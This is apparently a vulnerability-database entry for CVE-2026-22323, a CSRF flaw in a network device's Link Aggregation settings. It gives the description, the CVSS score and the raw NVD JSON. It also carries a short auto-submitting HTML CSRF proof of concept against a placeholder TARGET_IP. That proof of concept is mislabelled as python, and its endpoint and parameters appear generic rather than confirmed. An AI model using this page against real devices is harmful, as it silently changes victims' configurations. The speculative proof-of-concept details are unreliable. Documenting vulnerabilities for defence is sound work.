Security Vulnerability Report
中文
CVE-2026-22323 CVSS 7.1 HIGH

CVE-2026-22323

Published: 2026-03-18 08:16:31
Last Modified: 2026-04-27 19:22:09
Source: [email protected]

Description

A CSRF vulnerability in the Link Aggregation configuration interface allows an unauthenticated remote attacker to trick authenticated users into sending unauthorized POST requests to the device by luring them to a malicious webpage. This can silently alter the device’s configuration without the victim’s knowledge or consent. Availability impact was set to low because after a successful attack the device will automatically recover without external intervention.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L

Configurations (Affected Products)

No configuration data available.

支持Link Aggregation功能的网络设备(固件版本未明确)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2026-22323 CSRF PoC - Link Aggregation Configuration --> <html> <body> <h2>CVE-2026-22323 CSRF PoC</h2> <p>Target: Network Device Link Aggregation Configuration</p> <form id="csrfForm" action="http://TARGET_IP/cgi-bin/lag_config.cgi" method="POST"> <input type="hidden" name="action" value="modify" /> <input type="hidden" name="lag_id" value="1" /> <input type="hidden" name="members" value="port1,port2" /> <input type="hidden" name="mode" value="lacp" /> <input type="hidden" name="hash_key" value="" /> </form> <script> // Auto-submit form without user interaction document.getElementById('csrfForm').submit(); console.log('CSRF request sent'); </script> <p>If you see this, the attack may have failed.</p> </body> </html> <!-- Alternative: Image-based CSRF (for awareness) --> <img src="http://TARGET_IP/cgi-bin/lag_config.cgi?action=modify&lag_id=1&members=port1,port2" width="0" height="0" />

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22323", "sourceIdentifier": "[email protected]", "published": "2026-03-18T08:16:30.513", "lastModified": "2026-04-27T19:22:08.623", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A CSRF vulnerability in the Link Aggregation configuration interface allows an unauthenticated remote attacker to trick authenticated users into sending unauthorized POST requests to the device by luring them to a malicious webpage. This can silently alter the device’s configuration without the victim’s knowledge or consent. Availability impact was set to low because after a successful attack the device will automatically recover without external intervention."}, {"lang": "es", "value": "Una vulnerabilidad CSRF en la interfaz de configuración de Agregación de Enlaces permite a un atacante remoto no autenticado engañar a usuarios autenticados para que envíen solicitudes POST no autorizadas al dispositivo atrayéndolos a una página web maliciosa. Esto puede alterar silenciosamente la configuración del dispositivo sin el conocimiento o consentimiento de la víctima. El impacto en la disponibilidad se estableció en bajo porque después de un ataque exitoso el dispositivo se recuperará automáticamente sin intervención externa."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2025-104", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.